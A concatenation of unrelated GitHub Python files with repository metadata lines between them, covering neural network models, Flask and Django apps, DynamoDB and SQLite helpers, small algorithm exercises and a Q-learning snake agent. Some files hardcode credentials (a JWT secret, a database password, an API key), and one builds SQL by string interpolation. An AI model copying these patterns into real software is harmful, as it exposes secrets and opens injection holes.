return feat, int(y), AUDIO_TYPE_ID[audio_type], spk, ovec_feat
class BasicBlock(nn.Module):
def __init__(self, planes):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv1d(planes, planes, 3, 1, 1, bias=False)
self.bn1 = nn.BatchNorm1d(planes)
self.relu = nn.ReLU(inplace=True)
self.leakyrelu = nn.LeakyReLU(inplace=True)
self.conv2 = nn.Conv1d(planes, planes, 3, 1, 1, bias=False)
self.bn2 = nn.BatchNorm1d(planes)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.leakyrelu(out)
out = self.conv2(out)
out = self.bn2(out)
out += residual
out = self.leakyrelu(out)
return out
class conv_model1(nn.Module):
def __init__(self, TOTAL_NUM_SPKS):
super(conv_model1, self).__init__()
self.num_filter = 128
self.encoder = nn.Conv1d(40, self.num_filter, 3, 1, bias=False, padding=1)
self.encoder1 = nn.Conv1d(self.num_filter, self.num_filter, 3, 1, bias=False, padding=1)
self.encoder2 = nn.Conv1d(self.num_filter, self.num_filter, 3, 1, bias=False, padding=1, groups=self.num_filter)
# self.decoder = nn.Conv1d(self.num_filter, 40, 3, 1, bias=False, padding=1)
self.decoder = nn.ConvTranspose1d(self.num_filter, self.num_filter, 3,1,padding=1)
self.decoder1 = nn.ConvTranspose1d(self.num_filter, self.num_filter, 3,1,padding=1)
self.decoder2 = nn.ConvTranspose1d(self.num_filter, 40, 3,1,padding=1)
self.f2 = nn.Linear(self.num_filter, 6) # 6 classes
self.f3 = nn.Linear(self.num_filter, TOTAL_NUM_SPKS)
self.f4 = nn.Linear(self.num_filter, len(IMP_OVEC_FEAT))
self.basic1 = BasicBlock(self.num_filter)
self.basic2 = BasicBlock(self.num_filter)
self.bn = nn.BatchNorm1d(40)
def forward(self,x):
# x = self.bn(x)
enc = self.encoder(x)
enc = nn.LeakyReLU()(enc)
enc = self.encoder1(enc)
enc = self.basic1(enc)
enc = nn.LeakyReLU()(enc)
enc = self.encoder2(enc)
enc = nn.LeakyReLU()(enc)
# print("enc.shape: ", enc.shape)
dec = nn.LeakyReLU()(self.decoder(enc))
dec = nn.LeakyReLU()(self.decoder1(dec))
dec = self.basic2(dec)
dec = nn.LeakyReLU()(self.decoder2(dec))
# print("dec.shape: ", dec.shape)
enc_permute = enc.permute(0,2,1)
# print("enc_permute.shape ", enc_permute.shape)
enc_pooled = F.avg_pool1d(enc, kernel_size=(enc.shape[2])).squeeze()
out2 = nn.LeakyReLU()(self.f2(enc_pooled))
out3 = nn.LeakyReLU()(self.f3(enc_pooled))
out4 = nn.LeakyReLU()(self.f4(enc_pooled))
return dec, out2, out3, out4
class classification_model(nn.Module):
def __init__(self):
super(classification_model, self).__init__()
self.num_filter = 128
self.encoder = nn.Conv1d(40, self.num_filter, 3, 1, bias=False, padding=1)
self.encoder1 = nn.Conv1d(self.num_filter, self.num_filter, 3, 1, bias=False, padding=1, groups=self.num_filter)
self.encoder2 = nn.Conv1d(self.num_filter, self.num_filter, 3, 1, bias=False, padding=1, groups=self.num_filter)
self.f1 = nn.Linear(128, 2) # 2 classes
self.bn = nn.BatchNorm1d(40)
def forward(self,x):
# print(x.shape)
# x = self.bn(x)
enc = self.encoder(x)
enc = nn.LeakyReLU()(enc)
enc = self.encoder1(enc)
enc = nn.LeakyReLU()(enc)
enc = self.encoder2(enc)
enc = nn.LeakyReLU()(enc)
# enc = enc.permute(0,2,1) #b,t,f
# print("enc.shape ", enc.shape)
enc_permute = enc.permute(0,2,1)
# print("enc_permute.shape ", enc_permute.shape)
enc_pooled = F.avg_pool1d(enc, kernel_size=(enc.shape[2])).squeeze()
# print("enc_pooled ", enc_pooled.shape)
out = self.f1(enc_pooled) #b,t,2
# print(out.shape)
return enc_pooled, out
class OVEC_model(nn.Module):
def __init__(self, mode):
super(OVEC_model, self).__init__()
self.num_filter = 256
self.inp_channel = 40 #40
self.ovec_length = len(IMP_OVEC_FEAT)
self.cnn1 = nn.Conv1d(self.inp_channel, self.num_filter, kernel_size=3, stride=1, bias=False, padding=1)
self.cnn2 = nn.Conv1d(self.num_filter, self.num_filter, 3, 1, bias=False)
self.cnn3 = nn.Conv1d(self.num_filter, self.num_filter, 3, 1, bias=False)
self.f1 = nn.Linear(self.num_filter, self.ovec_length)
self.f2 = nn.Linear(self.num_filter, 2)
self.bn = nn.BatchNorm1d(self.num_filter)
self.bn1 = nn.BatchNorm1d(self.ovec_length)
self.mode = mode
def forward(self, x):
enc = self.cnn1(x)
enc = nn.LeakyReLU()(enc)
enc = self.cnn2(enc)
enc = nn.LeakyReLU()(enc)
enc = self.cnn3(enc)
enc = nn.LeakyReLU()(enc)
enc_permute = enc.permute(0,2,1)
enc_pooled = F.avg_pool1d(enc, kernel_size=(enc.shape[2])).squeeze()
# enc_pooled = self.bn(enc_pooled)
if self.mode == "ovec":
# print(enc_pooled)
out = self.f1(enc_pooled)
# print(out)
# out = self.bn1(out)
# print(out)
# exit()
if self.mode == "class":
out = self.f2(enc_pooled)
return out | KalibrateBlockchain/VFO2 | version_1/models_def.py | models_def.py | py | 8,707 | python | en | code | 0 | github-code | 36 |
30180224626 | from flask import Flask, render_template, request, redirect
import datetime
app=Flask(__name__)
messages=[]
@app.route('/')
def index():
return render_template("index.html.jinja2", messages=messages)
@app.route('/post/add/', methods=['POST'])
def add_message():
text = request.form.get('message')
timestamp = datetime.datetime.now()
messages.append({'text': text, 'timestamp': timestamp})
return redirect('/')
if __name__ == "__main__":
app.run(debug=True) | haishengbao/website | app.py | app.py | py | 490 | python | en | code | 0 | github-code | 36 |
29277732322 | # QUESTION:
# In Hogwarts the currency is made up of galleon (G) and Sickle (s),
# and there are seven coins in general circulation:
# 1s, 5s, 10s, 25s, 50s, G1(100s), and G2(200s)
# It's possible to make G3.5 in the following way:
# 1xG2 +1xG1 + 4x10s +1x5s + 5x1s
# How many different ways can G3.5 be made using any number of coins?
# Using Dynamic Programming: Bottom Up Memoization
from typing import List
def count(coins: List[int], sum: int):
n = len(coins)
# Initiate a table to store results
# The rows represent the sum, and the columns represent the coins
# The value of table[i][j] will be the number of solutions for
# sum = i and coins[0..j]
table = [[0 for x in range(n)] for x in range(sum+1)]
# Fill the entries for 0 sum
for i in range(n):
table[0][i] = 1
# Fill rest of the table entries in bottom up manner
for i in range(1, sum+1):
for j in range(n):
coin = coins[j]
# Count of solutions which include the coin
x = table[i - coin][j] if i-coin >= 0 else 0
# Count of solutions which do not include the coin
y = table[i][j-1] if j >= 1 else 0
# total count
table[i][j] = x + y
# for i, row in enumerate(table):
# print(f"{i}: {row}")
return table[sum][n-1]
# Hogwart coins as presented in the question
coins = [1, 5, 10, 25, 50, 100, 200]
sum = 350
print(f"There are {count(coins, sum)} ways to make {sum} using the following coins: {coins}") | krissukoco/hogwarts-coins | main.py | main.py | py | 1,525 | python | en | code | 0 | github-code | 36 |
25114962700 | from flask import Flask
from flask_restful import Resource, Api
from flask_jwt_extended import JWTManager
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from controler import *
app = Flask(__name__)
api = Api(app)
app.config['JWT_SECRET_KEY'] = 'qwejhfloimslvuywdkkvuhssss'
jwt = JWTManager(app)
engine = create_engine('postgresql://postgres:1234@localhost/db11', echo=True)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
if __name__ == "__main__":
api.add_resource(AddUser, '/user')
api.add_resource(Login, '/login')
api.add_resource(GetUser, '/user/<int:id>')
api.add_resource(GetMyself, '/user')
api.add_resource(UpdateUser, '/user')
api.add_resource(AddBank, '/bank')
api.add_resource(GetBank, '/bank/<int:id>')
api.add_resource(AddCredit, '/user/credit')
api.add_resource(UpdateCredit, '/user/credit/<int:credit_id>')
api.add_resource(GetCredit, '/user/credit/<int:credit_id>')
api.add_resource(AddTransaction, '/user/credit/<int:credit_id>/transaction')
api.add_resource(GetTransaction, '/user/credit/<int:credit_id>/transaction/<int:transaction_id>')
app.run(debug=True)
"""{
"username":"Vovik",
"first_name":"Vova",
"last_name":"Putin",
"phone":"09348124",
"email":"putin@gmail.com",
"password":"123"
}"""
'''
add bank
{
"all_money": 500000,
"per_cent" : 30
}
add user
{
"login": "mylogin",
"password": "my password",
"name": "myname",
"passport": "myUKRpasport",
"address": "Lviv",
"email": "user@gmail.com",
"phone_number": "88005553535"
"status": ""
}
add credit
{
"start_date": "21.01.2020",
"end_date": "21.01.2021",
"start_sum": 1000,
"current_sum": 100,
"bank_id": 1,
"user_id": 1
}
add transaction
{
"date": "17.12.2020",
"summ": 200
}
''' | VolodymyrVoloshyn02/PP | app.py | app.py | py | 1,882 | python | en | code | 0 | github-code | 36 |
1742330108 | import requests
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.views.generic import ListView, CreateView, DetailView, UpdateView, DeleteView
from .models import *
# Create your class-based views here.
@login_required()
def home(request):
fridge = Fridge.objects.filter(user=request.user)
context = {
'fridge': fridge,
}
return render(request, 'fridge/home.html', context)
class FridgeDetailView(DetailView):
model = Fridge
# CREATE ITEM
class FridgeCreateView(LoginRequiredMixin, CreateView):
model = Fridge
fields = ['name', 'quantity']
def form_valid(self, form):
form.instance.user = self.request.user
return super().form_valid(form)
# UPDATE ITEM
class FridgeUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Fridge
# When successfully deleted, will take user back to homepage
success_url = '/fridge'
fields = ['name', 'quantity']
def form_valid(self, form):
form.instance.user = self.request.user
return super().form_valid(form)
def test_func(self):
fridge_item = self.get_object()
# Prevents others to update other people's items
if self.request.user == fridge_item.user:
return True
return False
class FridgeDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Fridge
# When successfully deleted, will take user back to homepage
success_url = '/fridge'
def test_func(self):
fridge_item = self.get_object()
# Prevents others to update other people's items
if self.request.user == fridge_item.user:
return True
return False
@login_required()
def recipe(request):
url = "https://spoonacular-recipe-food-nutrition-v1.p.rapidapi.com/recipes/random"
querystring = {
'number': 1,
'veryPopular': True,
'fillIngredients': True,
'addRecipeInformation': True,
'addRecipeNutrition': True
}
headers = {
'x-rapidapi-host': "spoonacular-recipe-food-nutrition-v1.p.rapidapi.com",
'x-rapidapi-key': "f8540d734amsh0d72a908c3766d4p1be29fjsn28baee86ebe6"
}
res = requests.request("GET", url, headers=headers, params=querystring).json()['recipes']
instructions = get_instructions(res[0]['analyzedInstructions'])
ingredients = get_ingredients(res[0]['extendedIngredients'])
context = {
'title': res[0]['title'],
'instructions': instructions,
'ingredients': ingredients,
'recipe_link': res[0]['sourceUrl'],
'image_link': res[0]['image'],
}
print(res[0]['summary'])
return render(request, 'fridge/fridge_recipe.html', context)
def get_instructions(res: list) -> list:
instructions = []
for instruction in res[0]['steps']:
instructions.append(instruction['step'])
return instructions
def get_ingredients(res: list) -> list:
ingredients = []
for ingredient in res:
ingredients.append(ingredient['name'])
return ingredients
| cysong12/COMP-2800-Team-DTC-14-Cominder | Apps/fridge/views.py | views.py | py | 3,201 | python | en | code | 0 | github-code | 36 |
23407025114 | # -*- coding: utf-8 -*-
"""
Department to Employee is One to Many.
解决方案:
有的时候 One to Many 对应的 Many 可能数量太多, 无法作为冗余跟 One 一起储存.
这时可以以 One.id 建立 Global Index.
问题:
由于 GSI 本质是另一个 DynamoDB Table, 只不过系统帮你自动维护了. 同样的 GSI 也会根据
hash key 做 partition 分散流量. 如果 One 这边的 entity 的数量不够多. 那么会导致 GSI
的流量不均衡.
"""
import os
import random
import string
import typing
import pynamodb
from pynamodb.attributes import UnicodeAttribute
from pynamodb.connection import Connection
from pynamodb.indexes import GlobalSecondaryIndex, KeysOnlyProjection
from pynamodb.models import Model
os.environ["AWS_DEFAULT_PROFILE"] = "eq_sanhe"
connection = Connection()
class DepartmentModel(Model):
class Meta:
table_name = "one-to-many-department-2"
region = "us-east-1"
billing_mode = pynamodb.models.PAY_PER_REQUEST_BILLING_MODE
department_id = UnicodeAttribute(hash_key=True)
department_name = UnicodeAttribute()
@classmethod
def _create_one(cls, department_id, department_name):
try:
cls.get(hash_key=department_id)
except Model.DoesNotExist:
cls(
department_id=department_id,
department_name=department_name,
).save()
# @classmethod
# def _find_employees(cls, department_id: str):
# employee_info_map: EmployeeInfoMap
# return [
# EmployeeModel(
# employee_id=employee_info_map.employee_id,
# employee_name=employee_info_map.employee_name,
# )
# for employee_info_map in cls.get(hash_key=department_id).employees
# ]
class DepartmentEmployeeIndex(GlobalSecondaryIndex):
class Meta:
index = "one-to-many-department-employee-index-2"
projection = KeysOnlyProjection
department_id = UnicodeAttribute(hash_key=True, null=True)
class EmployeeModel(Model):
"""
A DynamoDB User
"""
class Meta:
table_name = "one-to-many-employee-2"
region = "us-east-1"
billing_mode = pynamodb.models.PAY_PER_REQUEST_BILLING_MODE
employee_id = UnicodeAttribute(hash_key=True)
employee_name = UnicodeAttribute()
department_id = UnicodeAttribute(null=True)
department_index = DepartmentEmployeeIndex()
@classmethod
def _create_one(cls, employee_id, employee_name, department_id=None):
try:
cls.get(hash_key=employee_id)
except Model.DoesNotExist:
cls(
employee_id=employee_id,
employee_name=employee_name,
department_id=department_id,
).save()
@classmethod
def _assign_department(cls, employee_id, department_id: str):
employee: EmployeeModel = cls.get(hash_key=employee_id)
if employee.department_id == department_id:
raise ValueError
else:
employee.update(
actions=[
EmployeeModel.department_id.set(department_id)
]
)
@classmethod
def _find_department(cls, employee_id: str) -> DepartmentModel:
return DepartmentModel.get(hash_key=cls.get(hash_key=employee_id).department_id)
DepartmentModel.create_table(wait=True)
EmployeeModel.create_table(wait=True)
class BusinessQuery:
@classmethod
def find_employees_by_department(cls, department_id) -> typing.Iterable[EmployeeModel]:
return EmployeeModel.department_index.query(department_id)
# --- Create Employee
def create_department():
DepartmentModel._create_one(department_id="IT", department_name="Internet Technology")
DepartmentModel._create_one(department_id="HR", department_name="Human Resource")
# create_department()
def create_employee():
def random_name():
return "".join(random.sample(string.ascii_lowercase, 8))
department_list = ["IT", "HR"]
n_employee = 1000
with EmployeeModel.batch_write() as batch:
for i in range(1, 1 + n_employee):
employee = EmployeeModel(
employee_id=f"e-{i}",
employee_name=random_name(),
department_id=random.choice(department_list)
)
batch.save(employee)
# create_employee()
def find_employees():
counter = 0
for employee in BusinessQuery.find_employees_by_department(department_id="IT"):
counter += 1
print(employee.employee_id, employee.employee_name)
print(f"total = {counter}")
find_employees()
def delete_all_tables():
DepartmentModel.delete_table()
EmployeeModel.delete_table()
# delete_all_tables()
| MacHu-GWU/Dev-Exp-Share | docs/source/01-AWS/01-All-AWS-Services-Root/21-Database/01-DynamoDB-Root/04-Dynamodb-Data-Modeling/principal/one-to-many/strategy2.py | strategy2.py | py | 4,760 | python | en | code | 3 | github-code | 36 |
70064841385 | import sqlite3
from database.API import db_actions
import json
class AllChannels():
def __init__(self):
self.DBActions = db_actions.DBOtherActions()
def GetAllChannels(self):
self.DBActions.cursor.execute('''
SELECT * from channels;
''')
return self.objectify_channel_output(self.DBActions.cursor.fetchall())
def objectify_channel_output(self, output):
print(output)
object_output = []
for object in output:
object_output.append({
"id": str(object[0]),
"name": object[1],
"type": object[2],
"number": str(object[3])
})
return object_output
class SearchChannels():
def __init__(self, channel):
self.channel = channel
self.DBActions = db_actions.DBOtherActions()
def searchChannel(self):
print(self.channel)
self.DBActions.cursor.execute('''
SELECT * FROM channels
WHERE id = ?;
''', (self.channel, ))
try:
# If tag exists, will be able to fetch the output
return self.objectify_channel_output(self.DBActions.cursor.fetchall()[0])
except IndexError:
return False
def objectify_channel_output(self, output):
#json_string = ('{ "id": '+ str(output[0]) +' , "name": ' + str(output[1]) + ', "type": ' + str(output[2]) + ', "number": ' + str(output[3]) + '}')
#return json.loads(json_string)
#return json.loads('{ "id": {}, "name": {}, "type": {}, "number": {}}').format(output[0], output[1], output[2], output[3])
return ({
"id": str(output[0]),
"name": output[1],
"type": output[2],
"number": str(output[3])
}) | OStillman/ODACShows | database/API/channels.py | channels.py | py | 1,812 | python | en | code | 0 | github-code | 36 |
72485218024 | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from . import views
from .apis import listings, users
from knox import views as knox_views
router = DefaultRouter()
router.register(r"users", users.UserViewSet, basename="users_api")
router.register(r"listings", listings.AuctionViewSet, basename="listings_api")
# https://stackoverflow.com/questions/63439268/how-to-use-parameters-in-drf-router
router.register(r"listings/(?P<auction_id>\d+)/bids", listings.BidViewSet, basename="bids_api")
router.register(r"listings/(?P<auction_id>\d+)/comments", listings.CommentViewSet, basename="comments_api")
urlpatterns = [
path("listings/<int:listing_id>/watch", listings.watch, name="watch_action"),
# User (Knox) Routes
path('', include(router.urls)),
#path('users/<int:pk>/update', users.UserUpdateView.as_view()),
#path('users/<int:pk>/deactivate', users.UserDeactivateView.as_view()),
path('auth-api/', include('knox.urls')),
path('logout', knox_views.LogoutView.as_view(), name="knox-logout"),
path('register', users.RegisterView.as_view()),
path('login', users.LoginView.as_view()),
] | pecodeliar/BayleeWeb | api/urls.py | urls.py | py | 1,160 | python | en | code | 0 | github-code | 36 |
42327126667 | """ There are many different ways of getting variables into your strings.
But the new f"" string beats them all (most of the time anyway).
"""
# Variables
age = 7
name = "Dean"
# All of the following strings will yield the same text - 'My name is Dean and I'm 7 years old.'
# They're just different ways of getting vatiables into the stings.
# BEFORE
text = "My name is " + name + " and I'm " + str(age) + " years old."
# OR MAYBE
text = "My name is {} and I'm {} years old.".format(name, age) # Notice no str() needed for age .format handles this.
# BUT NOW! (notice the 'f' before the start of the string - signifies this is a formatted string)
text = f"My name is {name} and I'm {age} years old." # So short, much wow.
| Honza-m/python-training | #python snippets/010 - New string formatting.py | 010 - New string formatting.py | py | 731 | python | en | code | 1 | github-code | 36 |
38221121523 | from itertools import permutations
def solution(k, dungeons):
answer = 0
per = list(permutations(dungeons, len(dungeons)))
for i in range(len(per)):
cnt = 0
copy_k = k
for j in range(len(per[i])):
if per[i][j][0] <= copy_k:
copy_k -= per[i][j][1]
cnt += 1
if cnt > answer:
answer = cnt
return answer
| kh-min7/Programmers | 87946(피로도).py | 87946(피로도).py | py | 411 | python | en | code | 0 | github-code | 36 |
25650877857 | import sqlite3
from sqlite3 import Error
def create_connection(path):
connection = None
try:
connection = sqlite3.connect(path)
print("Connection to SQLite DB successful")
except Error as e:
print(f"The error '{e}' occurred")
return connection
def connect_to_db():
return create_connection("contact_db.sqlite")
def execute_query(connection, query):
cursor = connection.cursor()
try:
cursor.execute(query)
connection.commit()
print("Query executed successfully")
except Error as e:
print(f"The error '{e}' occurred")
def execute_read_query(connection, query):
cursor = connection.cursor()
result = None
try:
cursor.execute(query)
result = cursor.fetchall()
return result
except Error as e:
print(f"The error '{e}' occurred")
def insert_query(email, subject, message):
Insert_contact = f"INSERT INTO contacts (email, subject, message) VALUES ('{email}', '{subject}', '{message}');"
return Insert_contact
def read_query():
return "SELECT * from contacts"
if __name__ =="__main__":
connection = create_connection("contact_db.sqlite")
create_contacts_table = """
CREATE TABLE IF NOT EXISTS contacts (
id INTEGER PRIMARY KEY AUTOINCREMENT,
email TEXT NOT NULL,
subject TEXT,
message TEXT
);
"""
execute_query(connection, create_contacts_table)
# Insert_contact = """
# INSERT INTO
# contacts (email, subject, message)
# VALUES
# ('test@test.com', 'test', 'test1'),
# ('test@test.com', 'test', 'test2');
# """
# execute_query(connection, Insert_contact)
select_contacts = "SELECT * from contacts"
contacts = execute_read_query(connection, select_contacts)
for contact in contacts:
print(contact) | rezzco/portfo | shit.py | shit.py | py | 1,772 | python | en | code | 0 | github-code | 36 |
3853619553 | from Logger import Logger
from HTTPRequest import HTTPRequest
import urllib.request
class HTTPProxyRequest(HTTPRequest):
retry_limit = 5
_response = None
_proxy_manager = None
@staticmethod
def set_proxy_manager(proxy_manager):
HTTPProxyRequest._proxy_manager = proxy_manager
def read(self):
if HTTPProxyRequest.retry_limit is not int:
HTTPProxyRequest.retry_limit = 5
try_count = 0
response = ''
while True:
if try_count == HTTPProxyRequest.retry_limit:
Logger.error('Could not retrieve page {}'.format(self._url))
break
proxy = HTTPProxyRequest._proxy_manager.get_proxy()
try:
Logger.message('Making request using proxy: {}'.format(self._url))
self.set_proxy(proxy, 'http')
self._response = urllib.request.urlopen(self, timeout=10)
response = self._response.read().decode('utf-8')
HTTPProxyRequest._proxy_manager.confirm_proxy(proxy)
break
except Exception as e:
Logger.error('Exception occurred while reading response for url {}, message: {}'.format(self._url, e))
HTTPProxyRequest._proxy_manager.remove_proxy(proxy)
try_count += 1
return response
| dsypniewski/allegro-profile-crawler | HTTPProxyRequest.py | HTTPProxyRequest.py | py | 1,359 | python | en | code | 0 | github-code | 36 |
36627705399 | import numpy as np
import random
from snake_no_visual import LearnSnake
import pickle
class SnakeQAgent():
def __init__(self):
# define initial parameters
self.discount_rate = 0.95
self.learning_rate = 0.01
self.eps = 1.0
self.eps_discount = 0.9992
self.min_eps = 0.001
self.num_episodes = 10000
self.table = np.zeros((2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 4))
self.env = LearnSnake()
self.score = []
self.survived = []
# epsilon-greedy action choice
def get_action(self, state):
# select random action (exploration)
if random.random() < self.eps:
return random.choice([0, 1, 2, 3])
# select best action (exploitation)
return np.argmax(self.table[state])
def train(self):
for i in range(1, self.num_episodes + 1):
self.env = LearnSnake()
steps_without_food = 0
length = self.env.snake_length
# print updates
if i % 25 == 0:
print(f"Episodes: {i}, score: {np.mean(self.score)}, survived: {np.mean(self.survived)}, eps: {self.eps}, lr: {self.learning_rate}")
self.score = []
self.survived = []
# occasionally save latest model
if (i < 500 and i % 10 == 0) or (i >= 500 and i < 1000 and i % 200 == 0) or (i >= 1000 and i % 500 == 0):
with open(f'pickle/{i}.pickle', 'wb') as file:
pickle.dump(self.table, file)
current_state = self.env.get_state()
self.eps = max(self.eps * self.eps_discount, self.min_eps)
done = False
while not done:
# choose action and take it
action = self.get_action(current_state)
new_state, reward, done = self.env.step(action)
# Bellman Equation Update
self.table[current_state][action] = (1 - self.learning_rate)\
* self.table[current_state][action] + self.learning_rate\
* (reward + self.discount_rate * max(self.table[new_state]))
current_state = new_state
steps_without_food += 1
if length != self.env.snake_length:
length = self.env.snake_length
steps_without_food = 0
if steps_without_food == 1000:
# break out of loops
break
# keep track of important metrics
self.score.append(self.env.snake_length - 1)
self.survived.append(self.env.survived)
| techtribeyt/snake-q-learning | snakeql.py | snakeql.py | py | 2,780 | python | en | code | 1 | github-code | 36 |
3896815670 | from datetime import timedelta
from pathlib import Path
import pytest
import htmap
from htmap.utils import timeout_to_seconds, wait_for_path_to_exist
def test_returns_when_path_does_exist():
path = Path(__file__)
wait_for_path_to_exist(path)
@pytest.mark.parametrize("timeout", [0, -1])
def test_timeout_on_nonexistent_path(timeout):
path = Path("foo")
with pytest.raises(htmap.exceptions.TimeoutError):
wait_for_path_to_exist(path, timeout=timeout)
@pytest.mark.parametrize(
"timeout, expected", [(1, 1.0), (0.1, 0.1), (timedelta(seconds=2.3), 2.3), (None, None),],
)
def test_timeout_to_seconds(timeout, expected):
assert timeout_to_seconds(timeout) == expected
| htcondor/htmap | tests/unit/test_wait_for_path_to_exist.py | test_wait_for_path_to_exist.py | py | 706 | python | en | code | 29 | github-code | 36 |
19795245501 | import json
import sys
from django.conf import settings
from django.utils import translation
from adapter.utils import build_auth_args
# from adapter.utils.local import get_request
from blueapps.utils import get_request
def _clean_auth_info_uin(auth_info):
if "uin" in auth_info:
# 混合云uin去掉第一位
if auth_info["uin"].startswith("o"):
auth_info["uin"] = auth_info["uin"][1:]
return auth_info
def update_bkdata_auth_info(params):
"""
更新参数中的数据平台鉴权信息
"""
if settings.FEATURE_TOGGLE.get("bkdata_token_auth", "off") == "on":
# 如果使用 bkdata token 鉴权,需要设置鉴权方式,如果是用户鉴权,直接沿用原来的用户
params["bkdata_authentication_method"] = params.get("bkdata_authentication_method") or "token"
params["bkdata_data_token"] = settings.BKDATA_DATA_TOKEN
else:
# 如果是用户授权,设置为admin超级管理员
params["bkdata_authentication_method"] = "user"
params["bk_username"] = "admin"
params["operator"] = "admin"
return params
# 后台任务 & 测试任务调用 ESB 接口不需要用户权限控制
if (
"celery" in sys.argv
or "shell" in sys.argv
or ("runserver" not in sys.argv and sys.argv and "manage.py" in sys.argv[0])
):
def add_esb_info_before_request(params):
params["bk_app_code"] = settings.APP_CODE
params["bk_app_secret"] = settings.SECRET_KEY
params.setdefault("bkdata_authentication_method", "user")
if "bk_username" not in params:
params["bk_username"] = "admin"
if "operator" not in params:
params["operator"] = params["bk_username"]
return params
def add_esb_info_before_request_for_bkdata(params):
params = add_esb_info_before_request(params)
params = update_bkdata_auth_info(params)
return params
# 正常 WEB 请求所使用的函数
else:
def add_esb_info_before_request(params):
"""
通过 params 参数控制是否检查 request
@param {Boolean} [params.no_request] 是否需要带上 request 标识
"""
# 规范后的参数
params["bk_app_code"] = settings.APP_CODE
params["bk_app_secret"] = settings.SECRET_KEY
params["appenv"] = settings.RUN_VER
if "no_request" in params and params["no_request"]:
params["bk_username"] = "admin"
params["operator"] = "admin"
else:
req = get_request()
auth_info = build_auth_args(req)
params.update(auth_info)
if not params.get("auth_info"):
auth_info = _clean_auth_info_uin(auth_info)
params["auth_info"] = json.dumps(auth_info)
params.update({"blueking_language": translation.get_language()})
bk_username = req.user.bk_username if hasattr(req.user, "bk_username") else req.user.username
if "bk_username" not in params:
params["bk_username"] = bk_username
if "operator" not in params:
params["operator"] = bk_username
# 兼容旧接口
params["uin"] = params["bk_username"]
params["app_code"] = settings.APP_CODE
params["app_secret"] = settings.SECRET_KEY
params.setdefault("bkdata_authentication_method", "user")
return params
| robert871126/bk-chatbot | adapter/api/modules/utils.py | utils.py | py | 3,445 | python | en | code | null | github-code | 36 |
4430013923 | '''Given a generic tree, find and return the height of given tree.
Sample Input 1:
10 3 20 30 40 2 40 50 0 0 0 0
Sample Output 1:
3
'''
import sys
import queue
class TreeNode :
def __init__(self, data) :
self.data = data
self.children = list()
def inputLevelWise(li) :
i = 0
data = li[i]
i += 1
if data == -1 :
return None
root = TreeNode(data)
q = queue.Queue()
q.put(root)
while (not q.empty()) :
frontNode = q.get()
noOfChildren = li[i]
i += 1
childrenArray = li[i : i+noOfChildren]
for childData in childrenArray :
childNode = TreeNode(childData)
frontNode.children.append(childNode)
q.put(childNode)
i = i+noOfChildren
return root
#main
sys.setrecursionlimit(10**6)
## Read input as specified in the question.
## Print output as specified in the question.
def height(root):
if root==None:
return 0
h=0
for child in root.children:
ch=height(child)
h=max(h,ch)
return h+1
li = [int(elem) for elem in list(input().strip().split())]
root = inputLevelWise(li)
print(height(root))
| Riyachauhan11/Python-learning-Concepts | Generic Trees/Height Of Tree.py | Height Of Tree.py | py | 1,184 | python | en | code | 0 | github-code | 36 |
304836991 | import tkinter as tk
import os.path
#ERROR MESSAGES
ERROR_NO_GAME_NAME = "Please enter a game name"
ERROR_ENTER_SOMETHING = "Please enter something"
ERROR_GAME_NAME_NOT_CHANGED = "Game name not changed"
#STANDARD MESSAGES
GAME_SELECTED = "Game selected"
SCORE_SEPARATOR = "/"
SCORE_RESET = "Score reset"
GAME_WON_VICTORY = "Victory"
GAME_LOST_DEFEAT = "Defeat"
ENTER_GAME_NAME = "Game name "
SET_GAME = "Set game"
ENTER_PREFIX_TEXT = "Prefix text"
SET_PREFIX_TEXT = "Set prefix text"
PREFIX_TEXT_SET = "Prefix text : "
TEXT_SCORE = "Score"
TEXT_RESTART = "Restart"
TEXT_WIN_BUTTON = "Victory"
TEXT_LOSS_BUTTON = "Defeat"
TEXT_DEBUG_MODE = "Debug mod"
TEXT_DEBUG_MODE_ACTIVATED = "Debug mode activated"
TEXT_DEBUG_MODE_DEACTIVATED = "Debug mode deactivated"
FILE_EXTENSION = ".txt"
TEXT_SCORE_RESET = "Score reset"
TEXT_GAME_SCORE = "Game score : "
TEXT_IS_EMPTY_FILE = " is empty"
TEXT_VOID = ""
#Program specific stuff
gameName = TEXT_VOID
gameText = TEXT_VOID
DEBUG_MODE = False
NB_CHAR = 20
WINDOW_WIDTH = 400
WINDOW_HEIGHT = 200
WINDOW_NAME = "Game Score Counter"
#Colors
WHITE = "white"
WIN = 1
LOSE = 0
WRITE = "w"
READ = "r"
TOP = "top"
BOTTOM = "bottom"
LEFT = "left"
RIGHT = "right"
def debug(text):
#Shows the message sent in argument if the counter is in debug mode
if(DEBUG_MODE == True):
print(text)
def emptyFile(file):
#Checks if the fils is empty
lines = file.read()
return(lines == "\n" or lines == TEXT_VOID)
def isValidFileName(fileName):
#Checks if the file name is valid (Windows standard)
valid = True
i = 0
while(i < len(fileName) and valid == True):
valid = (fileName[i] not in ['/', '\\', '?', '%', '*', ':', '|', "\"", "<", ">"])
return valid
def isNumber(char):
#Checks if a char is a number
return char >= '0' and char <= '9'
def changeDebugMode():
#Switches the debug mode
global DEBUG_MODE
DEBUG_MODE = (DEBUG_MODE == False)
if(DEBUG_MODE):
print(TEXT_DEBUG_MODE_ACTIVATED)
else:
print(TEXT_DEBUG_MODE_DEACTIVATED)
def readNumbers(lineRead):
#Read all the numbers in a string like this NOTNUMBERnumberNOTNUMBERnumberNOTNUMBERnumber..."
numbers = []
number = TEXT_VOID
end = len(lineRead)
i = 0
while(i < end):
number = TEXT_VOID
if(not isNumber(lineRead[i])): #Get the NOTNUMBER
i += 1
else:
for j in range(i, end):
if(isNumber(lineRead[j])): #Get the number
number += lineRead[j]
i += 1
else: #We have something not part of the number
i = j #And we tell the main loop to start from here
numbers.append(int(number)) #So we put the number we've had so far in the list
break
if(isNumber(lineRead[end - 1])): #If the line is finished by a number, it's not put at the end of the array, so we do it ourselves
numbers.append(int(number))
return numbers
class Counter(tk.Frame):
def isDefinedGameName(self):
